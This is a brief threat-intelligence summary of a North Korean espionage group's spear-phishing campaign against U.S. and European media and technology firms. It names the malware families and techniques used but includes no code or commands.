Mar 10, 2023 marks the latest cyber attack and malware campaign launched by North Korea espionage group, UNC2970. This malicious attack employed previously undocumented malware families in a spear-phishing campaign targeting U.S. and European media and technology organizations since June 2022. The attack is comprised of two threat clusters tracked as UNC577 (aka Temp.Hermit) and UNC4034.
The UNC4034 activity entailed the use of WhatsApp to socially engineer targets into downloading a backdoor called AIRDRY.V2 by providing them with a skills assessment test. UNC2970 then proceeded to use LinkedIn to contact victims and shift the conversation to WhatsApp, where a phishing payload was delivered under the guise of a job description.
The attack also deployed trojanized versions of TightVNC, which is engineered to load a next-stage payload labeled as LIDSHOT. This payload is capable of downloading and executing shellcode from a remote server. In addition, the attack employed a C++-based backdoor known as PLANKWALK to establish a foothold within the compromised environment.
To further complicate the attack, UNC2970 employed Microsoft Intune, an endpoint management solution, to drop a bespoke PowerShell script containing a Base64-encoded payload referred to as CLOUDBURST. This C-based backdoor communicates via HTTP. The attack also used the Bring Your Own Vulnerable Driver (BYOVD) technique by deploying an in-memory-only dropper called LIGHTSHIFT to facilitate the distribution of another piece of malware codenamed LIGHTSHOW.
In conclusion, UNC2970 is a North Korean espionage group that has launched a malicious cyber attack and malware campaign targeting U.S. and European media and technology organizations. The attack appears to be well planned and executed, employing various malware families, obfuscation techniques, and even vulnerable drivers. It is important for organizations and individuals to remain vigilant and secure their systems to mitigate the risk of such malicious campaigns. Key Points:
• North Korean espionage group, UNC2970, launched a malicious cyber attack and malware campaign targeting U.S. and European media and technology organizations.
• Attack employed previously undocumented malware families and various obfuscation techniques.
• Attackers used LinkedIn and WhatsApp to socially engineer victims and deliver a phishing payload.
• Attack employed trojanized versions of TightVNC, a C++-based backdoor known as PLANKWALK, and a bespoke PowerShell script containing a Base64-encoded payload referred to as CLOUDBURST.
• Attackers also employed the Bring Your Own Vulnerable Driver (BYOVD) technique with an in-memory-only dropper called LIGHTSHIFT.